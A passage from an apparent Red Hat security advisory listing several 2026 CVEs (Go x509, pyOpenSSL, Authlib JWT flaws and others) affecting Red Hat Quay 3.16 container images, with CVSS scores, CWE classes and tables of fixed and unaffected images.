Unresolved product id: Red Hat Quay 3.16:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:622a11babb195484a89cad806b9b79b6a99df53ad6ebb3d3d68b0a97ded78f79_ppc64le	—	Workaround
Unresolved product id: Red Hat Quay 3.16:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:9e77748984103da9604314a20f66f4fe9710f645dec385b1069ea20d9d0c6ed1_s390x	—	Workaround
Unresolved product id: Red Hat Quay 3.16:registry.redhat.io/quay/quay-operator-bundle@sha256:631c61a88de857bac8503386173a7689c462cfa07141969beb1ab958d85996a3_amd64	—	Workaround
Unresolved product id: Red Hat Quay 3.16:registry.redhat.io/quay/quay-operator-rhel9@sha256:2c5d16299741b7ebcb712479d5c82bb4fa498c6e043786abbff4c52b982c4879_s390x	—	Workaround
Unresolved product id: Red Hat Quay 3.16:registry.redhat.io/quay/quay-operator-rhel9@sha256:74cda2cf2b38b3cd62e5527e421dd7fbe756350e326e0b385ad9518302e08f03_amd64	—	Workaround
Unresolved product id: Red Hat Quay 3.16:registry.redhat.io/quay/quay-operator-rhel9@sha256:e77909a680cd9586f86b793363ffcba2352d25b2c255e7608582e6e7a6659ff2_ppc64le	—	Workaround

Threats

Impact Important

CVE-2026-27137

A certificate validation flaw has been discovered in the golang crypto/x509 module. When verifying a certificate chain which contains a certificate containing multiple email address constraints which share common local portions but different domain portions, these constraints will not be properly applied, and only the last constraint will be considered.

7.5 (High)


                        
                          CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

CWE-295 - Improper Certificate Validation

Affected products

Fixed 4 products

Product	Version	Remediation
Unresolved product id: Red Hat Quay 3.16:registry.redhat.io/quay/quay-rhel9@sha256:139cae64e4790ebf8b760c6376a33d15233222a25e4da39c6062d7e46c3a1bef_amd64	—	Vendor Fix fix Workaround
Unresolved product id: Red Hat Quay 3.16:registry.redhat.io/quay/quay-rhel9@sha256:52883f389182907dec0e286d626c4faea0f4ae29a5d0e841d6ad2287fdb964c2_arm64	—	Vendor Fix fix Workaround
Unresolved product id: Red Hat Quay 3.16:registry.redhat.io/quay/quay-rhel9@sha256:ad162e6ea2f6fd246f605180699ce36e4ea91c4b551c7af600a64e671a303ee9_s390x	—	Vendor Fix fix Workaround
Unresolved product id: Red Hat Quay 3.16:registry.redhat.io/quay/quay-rhel9@sha256:f6a15c2f1b4d5900cdbd366080e40d3a90d51ba9e5b4d6196e15eefe69d902c3_ppc64le	—	Vendor Fix fix Workaround

Known not affected 19 products

Product	Version	Remediation
Unresolved product id: Red Hat Quay 3.16:registry.redhat.io/quay/clair-rhel9@sha256:478f0e44eaf9907d18c8e765b16d80b9cc0bb3eac50ff8e118e3349aa29a9b46_ppc64le	—	Workaround
Unresolved product id: Red Hat Quay 3.16:registry.redhat.io/quay/clair-rhel9@sha256:4e7266596726edd7cde2b55bd7bed8910f4cbc1b310c11557e3552239ed3750f_s390x	—	Workaround
Unresolved product id: Red Hat Quay 3.16:registry.redhat.io/quay/clair-rhel9@sha256:f423a53dff70862980ee4381a9fe0fb5d19ce4d9932d7784491d057671d1fc2e_amd64	—	Workaround
Unresolved product id: Red Hat Quay 3.16:registry.redhat.io/quay/quay-bridge-operator-bundle@sha256:203097d7c260c95d7cf8e14a378542f75aae84f234a28d61d419f7b434562a9f_amd64	—	Workaround
Unresolved product id: Red Hat Quay 3.16:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:116b0249564f8424a5438e4a2edd0a9fa8c9449c4cea1ac1b642904d46dccf2f_ppc64le	—	Workaround
Unresolved product id: Red Hat Quay 3.16:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:68e02cfb3de2728a3f7f3cdd7b3ab231aa50ff51be51455bf1015ebc8addac66_s390x	—	Workaround
Unresolved product id: Red Hat Quay 3.16:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:f610987c52a000670dd5ba0a943f8d3ca38cdd71a0239a95b93260b4ce254b7b_amd64	—	Workaround
Unresolved product id: Red Hat Quay 3.16:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:6c64c35079e0af57beeb1dec93cad23c91dbfca34d25ecdf6326cdf5d557e1b9_amd64	—	Workaround
Unresolved product id: Red Hat Quay 3.16:registry.redhat.io/quay/quay-builder-rhel9@sha256:25be6b83e985ef60d32dec94f57f530b8a4be88c6f23627789f11eb4a0e8870b_amd64	—	Workaround
Unresolved product id: Red Hat Quay 3.16:registry.redhat.io/quay/quay-builder-rhel9@sha256:34d0eac97f889384b67037fdf957e53c02c7ec2579e436e28f49b66d586062cf_ppc64le	—	Workaround
Unresolved product id: Red Hat Quay 3.16:registry.redhat.io/quay/quay-builder-rhel9@sha256:8d71f18daf54d0311be34071b85d6f48c2895785c986e31a218cd748c443d60b_s390x	—	Workaround
Unresolved product id: Red Hat Quay 3.16:registry.redhat.io/quay/quay-container-security-operator-bundle@sha256:ae76dd5965cf14d53a81b5e88ec2f9406d12834a8f5fb1f3ee14fc3271ecceee_amd64	—	Workaround
Unresolved product id: Red Hat Quay 3.16:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:2fc63e77e837796a5082b58defffc6c46a9a4e8038190c9b8f87213bdf46c006_amd64	—	Workaround
Unresolved product id: Red Hat Quay 3.16:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:622a11babb195484a89cad806b9b79b6a99df53ad6ebb3d3d68b0a97ded78f79_ppc64le	—	Workaround
Unresolved product id: Red Hat Quay 3.16:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:9e77748984103da9604314a20f66f4fe9710f645dec385b1069ea20d9d0c6ed1_s390x	—	Workaround
Unresolved product id: Red Hat Quay 3.16:registry.redhat.io/quay/quay-operator-bundle@sha256:631c61a88de857bac8503386173a7689c462cfa07141969beb1ab958d85996a3_amd64	—	Workaround
Unresolved product id: Red Hat Quay 3.16:registry.redhat.io/quay/quay-operator-rhel9@sha256:2c5d16299741b7ebcb712479d5c82bb4fa498c6e043786abbff4c52b982c4879_s390x	—	Workaround
Unresolved product id: Red Hat Quay 3.16:registry.redhat.io/quay/quay-operator-rhel9@sha256:74cda2cf2b38b3cd62e5527e421dd7fbe756350e326e0b385ad9518302e08f03_amd64	—	Workaround
Unresolved product id: Red Hat Quay 3.16:registry.redhat.io/quay/quay-operator-rhel9@sha256:e77909a680cd9586f86b793363ffcba2352d25b2c255e7608582e6e7a6659ff2_ppc64le	—	Workaround

Threats

Impact Important

CVE-2026-27459

A flaw was found in pyOpenSSL. The set_cookie_generate_callback callback function can be used to generate DTLS cookies. When the callback returns a cookie string or byte sequence longer than 256 bytes, a buffer overflow can be triggered due to a missing bounds checking before copying the data to a fixed-size buffer provided by the underlying OpenSSL library.

8.1 (High)


                        
                          CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H

CWE-120 - Buffer Copy without Checking Size of Input ('Classic Buffer Overflow')

Affected products

Fixed 4 products

Product	Version	Remediation
Unresolved product id: Red Hat Quay 3.16:registry.redhat.io/quay/quay-rhel9@sha256:139cae64e4790ebf8b760c6376a33d15233222a25e4da39c6062d7e46c3a1bef_amd64	—	Vendor Fix fix Workaround
Unresolved product id: Red Hat Quay 3.16:registry.redhat.io/quay/quay-rhel9@sha256:52883f389182907dec0e286d626c4faea0f4ae29a5d0e841d6ad2287fdb964c2_arm64	—	Vendor Fix fix Workaround
Unresolved product id: Red Hat Quay 3.16:registry.redhat.io/quay/quay-rhel9@sha256:ad162e6ea2f6fd246f605180699ce36e4ea91c4b551c7af600a64e671a303ee9_s390x	—	Vendor Fix fix Workaround
Unresolved product id: Red Hat Quay 3.16:registry.redhat.io/quay/quay-rhel9@sha256:f6a15c2f1b4d5900cdbd366080e40d3a90d51ba9e5b4d6196e15eefe69d902c3_ppc64le	—	Vendor Fix fix Workaround

Known not affected 19 products

Product	Version	Remediation
Unresolved product id: Red Hat Quay 3.16:registry.redhat.io/quay/clair-rhel9@sha256:478f0e44eaf9907d18c8e765b16d80b9cc0bb3eac50ff8e118e3349aa29a9b46_ppc64le	—	Workaround
Unresolved product id: Red Hat Quay 3.16:registry.redhat.io/quay/clair-rhel9@sha256:4e7266596726edd7cde2b55bd7bed8910f4cbc1b310c11557e3552239ed3750f_s390x	—	Workaround
Unresolved product id: Red Hat Quay 3.16:registry.redhat.io/quay/clair-rhel9@sha256:f423a53dff70862980ee4381a9fe0fb5d19ce4d9932d7784491d057671d1fc2e_amd64	—	Workaround
Unresolved product id: Red Hat Quay 3.16:registry.redhat.io/quay/quay-bridge-operator-bundle@sha256:203097d7c260c95d7cf8e14a378542f75aae84f234a28d61d419f7b434562a9f_amd64	—	Workaround
Unresolved product id: Red Hat Quay 3.16:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:116b0249564f8424a5438e4a2edd0a9fa8c9449c4cea1ac1b642904d46dccf2f_ppc64le	—	Workaround
Unresolved product id: Red Hat Quay 3.16:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:68e02cfb3de2728a3f7f3cdd7b3ab231aa50ff51be51455bf1015ebc8addac66_s390x	—	Workaround
Unresolved product id: Red Hat Quay 3.16:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:f610987c52a000670dd5ba0a943f8d3ca38cdd71a0239a95b93260b4ce254b7b_amd64	—	Workaround
Unresolved product id: Red Hat Quay 3.16:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:6c64c35079e0af57beeb1dec93cad23c91dbfca34d25ecdf6326cdf5d557e1b9_amd64	—	Workaround
Unresolved product id: Red Hat Quay 3.16:registry.redhat.io/quay/quay-builder-rhel9@sha256:25be6b83e985ef60d32dec94f57f530b8a4be88c6f23627789f11eb4a0e8870b_amd64	—	Workaround
Unresolved product id: Red Hat Quay 3.16:registry.redhat.io/quay/quay-builder-rhel9@sha256:34d0eac97f889384b67037fdf957e53c02c7ec2579e436e28f49b66d586062cf_ppc64le	—	Workaround
Unresolved product id: Red Hat Quay 3.16:registry.redhat.io/quay/quay-builder-rhel9@sha256:8d71f18daf54d0311be34071b85d6f48c2895785c986e31a218cd748c443d60b_s390x	—	Workaround
Unresolved product id: Red Hat Quay 3.16:registry.redhat.io/quay/quay-container-security-operator-bundle@sha256:ae76dd5965cf14d53a81b5e88ec2f9406d12834a8f5fb1f3ee14fc3271ecceee_amd64	—	Workaround
Unresolved product id: Red Hat Quay 3.16:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:2fc63e77e837796a5082b58defffc6c46a9a4e8038190c9b8f87213bdf46c006_amd64	—	Workaround
Unresolved product id: Red Hat Quay 3.16:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:622a11babb195484a89cad806b9b79b6a99df53ad6ebb3d3d68b0a97ded78f79_ppc64le	—	Workaround
Unresolved product id: Red Hat Quay 3.16:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:9e77748984103da9604314a20f66f4fe9710f645dec385b1069ea20d9d0c6ed1_s390x	—	Workaround
Unresolved product id: Red Hat Quay 3.16:registry.redhat.io/quay/quay-operator-bundle@sha256:631c61a88de857bac8503386173a7689c462cfa07141969beb1ab958d85996a3_amd64	—	Workaround
Unresolved product id: Red Hat Quay 3.16:registry.redhat.io/quay/quay-operator-rhel9@sha256:2c5d16299741b7ebcb712479d5c82bb4fa498c6e043786abbff4c52b982c4879_s390x	—	Workaround
Unresolved product id: Red Hat Quay 3.16:registry.redhat.io/quay/quay-operator-rhel9@sha256:74cda2cf2b38b3cd62e5527e421dd7fbe756350e326e0b385ad9518302e08f03_amd64	—	Workaround
Unresolved product id: Red Hat Quay 3.16:registry.redhat.io/quay/quay-operator-rhel9@sha256:e77909a680cd9586f86b793363ffcba2352d25b2c255e7608582e6e7a6659ff2_ppc64le	—	Workaround

Threats

Impact Important

CVE-2026-27962

A flaw was found in Authlib, a Python library used for creating secure authentication and authorization systems. This vulnerability, known as JWK (JSON Web Key) Header Injection, affects how Authlib verifies digital signatures in JWS (JSON Web Signature) tokens. An attacker can exploit this by creating a specially crafted token that includes their own cryptographic key in the header. When the system attempts to verify this token without a predefined key, it mistakenly uses the attacker's key, allowing them to bypass authentication and gain unauthorized access.

9.1 (Critical)


                        
                          CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N

CWE-347 - Improper Verification of Cryptographic Signature

Affected products

Fixed 4 products

Product	Version	Remediation
Unresolved product id: Red Hat Quay 3.16:registry.redhat.io/quay/quay-rhel9@sha256:139cae64e4790ebf8b760c6376a33d15233222a25e4da39c6062d7e46c3a1bef_amd64	—	Vendor Fix fix
Unresolved product id: Red Hat Quay 3.16:registry.redhat.io/quay/quay-rhel9@sha256:52883f389182907dec0e286d626c4faea0f4ae29a5d0e841d6ad2287fdb964c2_arm64	—	Vendor Fix fix
Unresolved product id: Red Hat Quay 3.16:registry.redhat.io/quay/quay-rhel9@sha256:ad162e6ea2f6fd246f605180699ce36e4ea91c4b551c7af600a64e671a303ee9_s390x	—	Vendor Fix fix
Unresolved product id: Red Hat Quay 3.16:registry.redhat.io/quay/quay-rhel9@sha256:f6a15c2f1b4d5900cdbd366080e40d3a90d51ba9e5b4d6196e15eefe69d902c3_ppc64le	—	Vendor Fix fix

Known not affected 19 products

Product	Identifier	Version	Remediation
Unresolved product id: Red Hat Quay 3.16:registry.redhat.io/quay/clair-rhel9@sha256:478f0e44eaf9907d18c8e765b16d80b9cc0bb3eac50ff8e118e3349aa29a9b46_ppc64le		—
Unresolved product id: Red Hat Quay 3.16:registry.redhat.io/quay/clair-rhel9@sha256:4e7266596726edd7cde2b55bd7bed8910f4cbc1b310c11557e3552239ed3750f_s390x		—
Unresolved product id: Red Hat Quay 3.16:registry.redhat.io/quay/clair-rhel9@sha256:f423a53dff70862980ee4381a9fe0fb5d19ce4d9932d7784491d057671d1fc2e_amd64		—
Unresolved product id: Red Hat Quay 3.16:registry.redhat.io/quay/quay-bridge-operator-bundle@sha256:203097d7c260c95d7cf8e14a378542f75aae84f234a28d61d419f7b434562a9f_amd64		—
Unresolved product id: Red Hat Quay 3.16:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:116b0249564f8424a5438e4a2edd0a9fa8c9449c4cea1ac1b642904d46dccf2f_ppc64le		—
Unresolved product id: Red Hat Quay 3.16:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:68e02cfb3de2728a3f7f3cdd7b3ab231aa50ff51be51455bf1015ebc8addac66_s390x		—
Unresolved product id: Red Hat Quay 3.16:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:f610987c52a000670dd5ba0a943f8d3ca38cdd71a0239a95b93260b4ce254b7b_amd64		—
Unresolved product id: Red Hat Quay 3.16:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:6c64c35079e0af57beeb1dec93cad23c91dbfca34d25ecdf6326cdf5d557e1b9_amd64		—
Unresolved product id: Red Hat Quay 3.16:registry.redhat.io/quay/quay-builder-rhel9@sha256:25be6b83e985ef60d32dec94f57f530b8a4be88c6f23627789f11eb4a0e8870b_amd64		—
Unresolved product id: Red Hat Quay 3.16:registry.redhat.io/quay/quay-builder-rhel9@sha256:34d0eac97f889384b67037fdf957e53c02c7ec2579e436e28f49b66d586062cf_ppc64le		—
Unresolved product id: Red Hat Quay 3.16:registry.redhat.io/quay/quay-builder-rhel9@sha256:8d71f18daf54d0311be34071b85d6f48c2895785c986e31a218cd748c443d60b_s390x		—
Unresolved product id: Red Hat Quay 3.16:registry.redhat.io/quay/quay-container-security-operator-bundle@sha256:ae76dd5965cf14d53a81b5e88ec2f9406d12834a8f5fb1f3ee14fc3271ecceee_amd64		—
Unresolved product id: Red Hat Quay 3.16:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:2fc63e77e837796a5082b58defffc6c46a9a4e8038190c9b8f87213bdf46c006_amd64		—
Unresolved product id: Red Hat Quay 3.16:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:622a11babb195484a89cad806b9b79b6a99df53ad6ebb3d3d68b0a97ded78f79_ppc64le		—
Unresolved product id: Red Hat Quay 3.16:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:9e77748984103da9604314a20f66f4fe9710f645dec385b1069ea20d9d0c6ed1_s390x		—
Unresolved product id: Red Hat Quay 3.16:registry.redhat.io/quay/quay-operator-bundle@sha256:631c61a88de857bac8503386173a7689c462cfa07141969beb1ab958d85996a3_amd64		—
Unresolved product id: Red Hat Quay 3.16:registry.redhat.io/quay/quay-operator-rhel9@sha256:2c5d16299741b7ebcb712479d5c82bb4fa498c6e043786abbff4c52b982c4879_s390x		—
Unresolved product id: Red Hat Quay 3.16:registry.redhat.io/quay/quay-operator-rhel9@sha256:74cda2cf2b38b3cd62e5527e421dd7fbe756350e326e0b385ad9518302e08f03_amd64		—
Unresolved product id: Red Hat Quay 3.16:registry.redhat.io/quay/quay-operator-rhel9@sha256:e77909a680cd9586f86b793363ffcba2352d25b2c255e7608582e6e7a6659ff2_ppc64le		—

Threats

Impact Low

CVE-2026-28802

A flaw was found in Authlib, a Python library for building OAuth and OpenID Connect servers. A remote attacker can exploit this vulnerability by crafting a malicious JSON Web Token (JWT) with a "none" algorithm and an empty signature. This bypasses the expected signature verification, potentially allowing the attacker to forge tokens and gain unauthorized access or perform unauthorized actions within applications using Authlib.

9.1 (Critical)


                        
                          CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N

CWE-347 - Improper Verification of Cryptographic Signature

Affected products

Fixed 4 products

Product	Version	Remediation
Unresolved product id: Red Hat Quay 3.16:registry.redhat.io/quay/quay-rhel9@sha256:139cae64e4790ebf8b760c6376a33d15233222a25e4da39c6062d7e46c3a1bef_amd64	—	Vendor Fix fix Workaround
Unresolved product id: Red Hat Quay 3.16:registry.redhat.io/quay/quay-rhel9@sha256:52883f389182907dec0e286d626c4faea0f4ae29a5d0e841d6ad2287fdb964c2_arm64	—	Vendor Fix fix Workaround
Unresolved product id: Red Hat Quay 3.16:registry.redhat.io/quay/quay-rhel9@sha256:ad162e6ea2f6fd246f605180699ce36e4ea91c4b551c7af600a64e671a303ee9_s390x	—	Vendor Fix fix Workaround
Unresolved product id: Red Hat Quay 3.16:registry.redhat.io/quay/quay-rhel9@sha256:f6a15c2f1b4d5900cdbd366080e40d3a90d51ba9e5b4d6196e15eefe69d902c3_ppc64le	—	Vendor Fix fix Workaround

Known not affected 19 products

Product	Version	Remediation
Unresolved product id: Red Hat Quay 3.16:registry.redhat.io/quay/clair-rhel9@sha256:478f0e44eaf9907d18c8e765b16d80b9cc0bb3eac50ff8e118e3349aa29a9b46_ppc64le	—	Workaround
Unresolved product id: Red Hat Quay 3.16:registry.redhat.io/quay/clair-rhel9@sha256:4e7266596726edd7cde2b55bd7bed8910f4cbc1b310c11557e3552239ed3750f_s390x	—	Workaround
Unresolved product id: Red Hat Quay 3.16:registry.redhat.io/quay/clair-rhel9@sha256:f423a53dff70862980ee4381a9fe0fb5d19ce4d9932d7784491d057671d1fc2e_amd64	—	Workaround
Unresolved product id: Red Hat Quay 3.16:registry.redhat.io/quay/quay-bridge-operator-bundle@sha256:203097d7c260c95d7cf8e14a378542f75aae84f234a28d61d419f7b434562a9f_amd64	—	Workaround
Unresolved product id: Red Hat Quay 3.16:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:116b0249564f8424a5438e4a2edd0a9fa8c9449c4cea1ac1b642904d46dccf2f_ppc64le	—	Workaround
Unresolved product id: Red Hat Quay 3.16:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:68e02cfb3de2728a3f7f3cdd7b3ab231aa50ff51be51455bf1015ebc8addac66_s390x	—	Workaround
Unresolved product id: Red Hat Quay 3.16:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:f610987c52a000670dd5ba0a943f8d3ca38cdd71a0239a95b93260b4ce254b7b_amd64	—	Workaround
Unresolved product id: Red Hat Quay 3.16:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:6c64c35079e0af57beeb1dec93cad23c91dbfca34d25ecdf6326cdf5d557e1b9_amd64	—	Workaround
Unresolved product id: Red Hat Quay 3.16:registry.redhat.io/quay/quay-builder-rhel9@sha256:25be6b83e985ef60d32dec94f57f530b8a4be88c6f23627789f11eb4a0e8870b_amd64	—	Workaround
Unresolved product id: Red Hat Quay 3.16:registry.redhat.io/quay/quay-builder-rhel9@sha256:34d0eac97f889384b67037fdf957e53c02c7ec2579e436e28f49b66d586062cf_ppc64le	—	Workaround
Unresolved product id: Red Hat Quay 3.16:registry.redhat.io/quay/quay-builder-rhel9@sha256:8d71f18daf54d0311be34071b85d6f48c2895785c986e31a218cd748c443d60b_s390x	—	Workaround
Unresolved product id: Red Hat Quay 3.16:registry.redhat.io/quay/quay-container-security-operator-bundle@sha256:ae76dd5965cf14d53a81b5e88ec2f9406d12834a8f5fb1f3ee14fc3271ecceee_amd64	—	Workaround
Unresolved product id: Red Hat Quay 3.16:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:2fc63e77e837796a5082b58defffc6c46a9a4e8038190c9b8f87213bdf46c006_amd64	—	Workaround
Unresolved product id: Red Hat Quay 3.16:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:622a11babb195484a89cad806b9b79b6a99df53ad6ebb3d3d68b0a97ded78f79_ppc64le	—	Workaround
Unresolved product id: Red Hat Quay 3.16:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:9e77748984103da9604314a20f66f4fe9710f645dec385b1069ea20d9d0c6ed1_s390x	—	Workaround
Unresolved product id: Red Hat Quay 3.16:registry.redhat.io/quay/quay-operator-bundle@sha256:631c61a88de857bac8503386173a7689c462cfa07141969beb1ab958d85996a3_amd64	—	Workaround
Unresolved product id: Red Hat Quay 3.16:registry.redhat.io/quay/quay-operator-rhel9@sha256:2c5d16299741b7ebcb712479d5c82bb4fa498c6e043786abbff4c52b982c4879_s390x	—	Workaround
Unresolved product id: Red Hat Quay 3.16:registry.redhat.io/quay/quay-operator-rhel9@sha256:74cda2cf2b38b3cd62e5527e421dd7fbe756350e326e0b385ad9518302e08f03_amd64	—	Workaround
Unresolved product id: Red Hat Quay 3.16:registry.redhat.io/quay/quay-operator-rhel9@sha256:e77909a680cd9586f86b793363ffcba2352d25b2c255e7608582e6e7a6659ff2_ppc64le	—	Workaround

Threats

Impact Important

CVE-2026-29063

8.8 (High)


                        
                          CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H

CWE-915 - Improperly Controlled Modification of Dynamically-Determined Object Attributes

Affected products

Fixed 4 products

Product	Version	Remediation
Unresolved product id: Red Hat Quay 3.16:registry.redhat.io/quay/quay-rhel9@sha256:139cae64e4790ebf8b760c6376a33d15233222a25e4da39c6062d7e46c3a1bef_amd64	—	Vendor Fix fix
Unresolved product id: Red Hat Quay 3.16:registry.redhat.io/quay/quay-rhel9@sha256:52883f389182907dec0e286d626c4faea0f4ae29a5d0e841d6ad2287fdb964c2_arm64	—	Vendor Fix fix
Unresolved product id: Red Hat Quay 3.16:registry.redhat.io/quay/quay-rhel9@sha256:ad162e6ea2f6fd246f605180699ce36e4ea91c4b551c7af600a64e671a303ee9_s390x	—	Vendor Fix fix
Unresolved product id: Red Hat Quay 3.16:registry.redhat.io/quay/quay-rhel9@sha256:f6a15c2f1b4d5900cdbd366080e40d3a90d51ba9e5b4d6196e15eefe69d902c3_ppc64le	—	Vendor Fix fix

Known not affected 19 products

Product	Identifier	Version	Remediation
Unresolved product id: Red Hat Quay 3.16:registry.redhat.io/quay/clair-rhel9@sha256:478f0e44eaf9907d18c8e765b16d80b9cc0bb3eac50ff8e118e3349aa29a9b46_ppc64le		—
Unresolved product id: Red Hat Quay 3.16:registry.redhat.io/quay/clair-rhel9@sha256:4e7266596726edd7cde2b55bd7bed8910f4cbc1b310c11557e3552239ed3750f_s390x		—
Unresolved product id: Red Hat Quay 3.16:registry.redhat.io/quay/clair-rhel9@sha256:f423a53dff70862980ee4381a9fe0fb5d19ce4d9932d7784491d057671d1fc2e_amd64		—
Unresolved product id: Red Hat Quay 3.16:registry.redhat.io/quay/quay-bridge-operator-bundle@sha256:203097d7c260c95d7cf8e14a378542f75aae84f234a28d61d419f7b434562a9f_amd64		—
Unresolved product id: Red Hat Quay 3.16:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:116b0249564f8424a5438e4a2edd0a9fa8c9449c4cea1ac1b642904d46dccf2f_ppc64le		—
Unresolved product id: Red Hat Quay 3.16:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:68e02cfb3de2728a3f7f3cdd7b3ab231aa50ff51be51455bf1015ebc8addac66_s390x		—
Unresolved product id: Red Hat Quay 3.16:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:f610987c52a000670dd5ba0a943f8d3ca38cdd71a0239a95b93260b4ce254b7b_amd64		—
Unresolved product id: Red Hat Quay 3.16:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:6c64c35079e0af57beeb1dec93cad23c91dbfca34d25ecdf6326cdf5d557e1b9_amd64		—
Unresolved product id: Red Hat Quay 3.16:registry.redhat.io/quay/quay-builder-rhel9@sha256:25be6b83e985ef60d32dec94f57f530b8a4be88c6f23627789f11eb4a0e8870b_amd64		—
Unresolved product id: Red Hat Quay 3.16:registry.redhat.io/quay/quay-builder-rhel9@sha256:34d0eac97f889384b67037fdf957e53c02c7ec2579e436e28f49b66d586062cf_ppc64le		—
Unresolved product id: Red Hat Quay 3.16:registry.redhat.io/quay/quay-builder-rhel9@sha256:8d71f18daf54d0311be34071b85d6f48c2895785c986e31a218cd748c443d60b_s390x		—
Unresolved product id: Red Hat Quay 3.16:registry.redhat.io/quay/quay-container-security-operator-bundle@sha256:ae76dd5965cf14d53a81b5e88ec2f9406d12834a8f5fb1f3ee14fc3271ecceee_amd64		—
Unresolved product id: Red Hat Quay 3.16:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:2fc63e77e837796a5082b58defffc6c46a9a4e8038190c9b8f87213bdf46c006_amd64		—
Unresolved product id: Red Hat Quay 3.16:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:622a11babb195484a89cad806b9b79b6a99df53ad6ebb3d3d68b0a97ded78f79_ppc64le		—
Unresolved product id: Red Hat Quay 3.16:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:9e77748984103da9604314a20f66f4fe9710f645dec385b1069ea20d9d0c6ed1_s390x		—
Unresolved product id: Red Hat Quay 3.16:registry.redhat.io/quay/quay-operator-bundle@sha256:631c61a88de857bac8503386173a7689c462cfa07141969beb1ab958d85996a3_amd64		—
Unresolved product id: Red Hat Quay 3.16:registry.redhat.io/quay/quay-operator-rhel9@sha256:2c5d16299741b7ebcb712479d5c82bb4fa498c6e043786abbff4c52b982c4879_s390x		—
Unresolved product id: Red Hat Quay 3.16:registry.redhat.io/quay/quay-operator-rhel9@sha256:74cda2cf2b38b3cd62e5527e421dd7fbe756350e326e0b385ad9518302e08f03_amd64		—
Unresolved product id: Red Hat Quay 3.16:registry.redhat.io/quay/quay-operator-rhel9@sha256:e77909a680cd9586f86b793363ffcba2352d25b2c255e7608582e6e7a6659ff2_ppc64le		—

Threats

Impact Important

CVE-2026-29074

7.5 (High)


                        
                          CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

CWE-776 - Improper Restriction of Recursive Entity References in DTDs ('XML Entity Expansion')

Affected products

Fixed 4 products

Product	Version	Remediation
Unresolved product id: Red Hat Quay 3.16:registry.redhat.io/quay/quay-rhel9@sha256:139cae64e4790ebf8b760c6376a33d15233222a25e4da39c6062d7e46c3a1bef_amd64	—	Vendor Fix fix Workaround
Unresolved product id: Red Hat Quay 3.16:registry.redhat.io/quay/quay-rhel9@sha256:52883f389182907dec0e286d626c4faea0f4ae29a5d0e841d6ad2287fdb964c2_arm64	—	Vendor Fix fix Workaround
Unresolved product id: Red Hat Quay 3.16:registry.redhat.io/quay/quay-rhel9@sha256:ad162e6ea2f6fd246f605180699ce36e4ea91c4b551c7af600a64e671a303ee9_s390x	—	Vendor Fix fix Workaround
Unresolved product id: Red Hat Quay 3.16:registry.redhat.io/quay/quay-rhel9@sha256:f6a15c2f1b4d5900cdbd366080e40d3a90d51ba9e5b4d6196e15eefe69d902c3_ppc64le	—	Vendor Fix fix Workaround

Known not affected 19 products

Product	Version	Remediation
Unresolved product id: Red Hat Quay 3.16:registry.redhat.io/quay/clair-rhel9@sha256:478f0e44eaf9907d18c8e765b16d80b9cc0bb3eac50ff8e118e3349aa29a9b46_ppc64le	—	Workaround
Unresolved product id: Red Hat Quay 3.16:registry.redhat.io/quay/clair-rhel9@sha256:4e7266596726edd7cde2b55bd7bed8910f4cbc1b310c11557e3552239ed3750f_s390x	—	Workaround
Unresolved product id: Red Hat Quay 3.16:registry.redhat.io/quay/clair-rhel9@sha256:f423a53dff70862980ee4381a9fe0fb5d19ce4d9932d7784491d057671d1fc2e_amd64	—	Workaround
Unresolved product id: Red Hat Quay 3.16:registry.redhat.io/quay/quay-bridge-operator-bundle@sha256:203097d7c260c95d7cf8e14a378542f75aae84f234a28d61d419f7b434562a9f_amd64	—	Workaround
Unresolved product id: Red Hat Quay 3.16:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:116b0249564f8424a5438e4a2edd0a9fa8c9449c4cea1ac1b642904d46dccf2f_ppc64le	—	Workaround
Unresolved product id: Red Hat Quay 3.16:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:68e02cfb3de2728a3f7f3cdd7b3ab231aa50ff51be51455bf1015ebc8addac66_s390x	—	Workaround
